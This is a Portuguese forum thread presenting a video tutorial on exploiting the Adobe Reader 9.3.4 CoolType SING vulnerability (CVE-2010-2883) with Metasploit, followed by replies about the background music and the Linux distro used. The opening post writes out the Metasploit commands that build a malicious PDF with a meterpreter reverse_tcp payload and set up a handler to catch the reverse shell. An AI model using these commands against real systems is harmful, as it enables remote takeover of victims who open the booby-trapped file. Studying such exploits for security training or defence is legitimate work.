[Video aula] Vulnerabilidade no Adobe Reader 9.3.4(0day)
Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores.
Comandos:
Quote:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler
Sobre o Vídeo:
Formato: AVI
Tamanho: 18.8 MB
Duração: 5:59 min
Musica: Carl Orff - Carmina Burana - O Fortuna
Baixar:
On line:
Obs: Usei na aula a distro Ubuntu com Metasploit. A mesmo pode ser na distro do BT.
Ref:
CVE - CVE-2010-2883 (under review)
67849: Adobe Reader / Acrobat CoolType.dll SING (Smart INdependent Glyphlets) Font uniqueName Field Parsing Overflow
contagio: CVE-2010-2883 Adobe 0-Day David Leadbetter's One Point Lesson from 193.106.85.61 thomasbennett34@yahoo.com
Adobe - Security Advisories: APSA10-02 - Security Advisory for Adobe Reader and Acrobat
Fonte: Blog do Bhior: Vulnerabilidade no Adobe Reader 9.3.4(0day)
Re: [Video aula] Vulnerabilidade no Adobe Reader 9.3.4(0day)
Poxa, mando bem na escolha da música, Carmina burana é show! :p
O vídeo também ficou legal!
Só pecou em não utilizar a distro Backtrack no fórum do backtrack! :confused:
Att,
Re: [Video aula] Vulnerabilidade no Adobe Reader 9.3.4(0day)
Quote:
Originally Posted by
espreto
Só pecou em não utilizar a distro Backtrack no fórum do backtrack! :confused:
Se bem que o fundo do ambiente de trabalho está original! xD
Re: [Video aula] Vulnerabilidade no Adobe Reader 9.3.4(0day)
Quote:
Originally Posted by
espreto
Poxa, mando bem na escolha da música, Carmina burana é show! :p
O vídeo também ficou legal!
Só pecou em não utilizar a distro Backtrack no fórum do backtrack! :confused:
Att,
Verdade, so pensei nisso depois que fiz a aula, pois a resolução da tela dos sistema não fica igual. E como o snayler disse, pelo menos coloquei o wallpapers :P
Abraços
